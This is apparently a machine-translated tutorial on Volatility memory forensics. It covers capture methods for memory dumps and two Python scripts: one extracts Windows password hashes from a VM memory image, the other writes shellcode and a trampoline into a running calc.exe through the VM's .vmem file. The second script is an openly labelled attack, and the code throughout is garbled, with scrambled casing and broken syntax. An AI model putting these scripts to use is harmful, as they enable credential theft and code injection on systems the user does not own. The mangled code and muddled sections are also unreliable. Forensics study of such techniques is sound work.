Automated attack forensics 1. volatility--Advanced Memory Forensics Framework Tool
After the network has been compromised, it is necessary to verify if an attack event has occurred, usually requiring a memory snapshot of the infected host. You can use volatility to perform tasks such as kernel object checking, process memory detection and extraction, and provide forensic analysis capabilities.
Volatility
1.1 Environment construction and dump crawl
Environment needs python2.7
1.1.2 Linux (Kali)
Switch to the volatility directory with the shell
1.1.3 Generating a memory dump file
Volatility is analyzing the memory dump file, so we need to crawl the memory dump on a system that is suspected of being attacked. There are 3 main ways to crawl memory dumps.
- Using cuckoo sandbox to generate memory dump features
- Using VMware to generate memory dump features
- Use third-party software to crawl memory dump
1.1.41.1.5 using VMware
Pause the virtual machine system, and then locate the *.vmem in the corresponding directory, for example:
1.1.6 using third-party software to crawl
For physical machines, you can often use the following tools to crawl memory dumps:
KnTToolsF-ResponseMandiant MemoryzeHBGary FastDumpMoonSols Windows Memory ToolkitAccessData FTK ImagerEnCase/WinEnBelkasoft Live RAM CapturerATC-NY Windows Memory ReaderWinpmemWin32dd/Win64ddDumpIt
1.2 Tools Use 1.2.1 behavior: Fetch password hash value
Import Sysimport structmemory_file = "Winxpsp2.vmem" Sys.path.append ("/downloads/volatility-2.3.1") Import volatility . conf as Confimport Volatility.registry as Registryregistry. Pluginimporter () config = conf. Confobject () Import volatility.commands as Commandsimport Volatility.addrspace as Addrspaceconfig.parse_options () Config. Profile = "winxpsp2x86" config. Location = "file://%s"% memory_fileregistry.register_global_options (config, commands. Command) registry.register_global_options (config, addrspace. Baseaddressspace) from Volatility.plugins.registry.registryapi import Registryapifrom Volatility.plugins.registry.lsadump Import hashdumpregistry = registryapi (config) registry.populate_offsets () SAM_ offset = Nonesys_offset = nonefor offset in registry.all_offsets:if registry.all_offsets[offset].endswith ("\\SAM") : Sam_offset = offset print "[*] sam:0x%08x"% offset if registry.all_offsets[offset].endswith ("\\sy Stem "): Sys_offset = offset print" [*]system:0x%08x "% offset if sam_offset is not None and sys_offset is not None:config.sys_offset = SYS_OFFSE T config.sam_offset = Sam_offset hashdump = hashdump (config) for hash in hashdump.cal Culate (): Print hash breakif sam_offset is None or sys_offset are None:print "[*] Failed to F IND the system or SAM offsets.
1.2.2 Behavior: Direct code injection
Import Sysimport Structequals_button = 0x01005d51memory_file = "/users/justin/documents/virtual Machines.localized/W indows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem "slack_space = Nonetrampoline_ offset = none# read in our SHELLCODESC_FD = open ("Cmeasure.bin", "RB") sc = Sc_fd.read () sc_fd.close () sys.path.append ("/do wnloads/volatility-2.3.1 ") Import volatility.conf as Confimport volatility.registry as Registryregistry. Pluginimporter () config = conf. Confobject () Import volatility.commands as Commandsimport Volatility.addrspace as Addrspaceregistry.register_global_ Options (config, commands.command) registry.register_global_options (config, addrspace. Baseaddressspace) config.parse_options () config. Profile = "win2003sp2x86" config. Location = "file://%s"% memory_fileimport volatility.plugins.taskmods as TASKMODSP = Taskmods. PSList (config) for process in P.calculate (): If STR (process. imagefilename) = = "Calc.exe": print "[*] Found Calc. exe with PID%d "% process. UNIQUEPROCESSID print "[*] hunting for physical offsets...please wait." Address_space = Process.get_process_address_space () pages = Address_space.get_available_pages () For page in pages:physical = Address_space.vtop (page[0]) If physical are not None: If slack_space is NONE:FD = open (Memory_file, "r+ ") Fd.seek (physical) buf = Fd.read (page[1]) t Ry:offset = Buf.index ("\x00" * Len (SC)) Slack_space = page[0] + offset Print "[*] Found good shellcode location!" Print "[*] Virtual address:0x%08x"% slack_space print "[*] Physical address:0x%08x"% (physical + offset) PRINT "[*] injecting shellcode." Fd.seek (physical + offset) Fd.write (SC) Fd.flush () # Create our trampoline tramp = "\xbb%s"% struct.pack ("<l", page[0] + off Set) Tramp + = "\xff\xe3" If Trampoline_offset is not None:break Except:pass Fd.close () # Check for we target code location If page[0] <= Equals_button and Equals_button < ((Page[0] + page[1])-7): # calculate virtual Offset V_offset = equals_button-page[0] # Now calculate physical offset TRAMPOLINE_OFFSEt = physical + v_offset print "[*] Found our trampoline target at:0x%08x"% (tramp Oline_offset) If Slack_space is not none:break Print "[*] Writing trampoline ..." FD = open (Memory_file, "r+") Fd.seek (Trampoline_offset) Fd.write (Tramp) fd.close () print "[*] done injecting code."
Python automatic attack script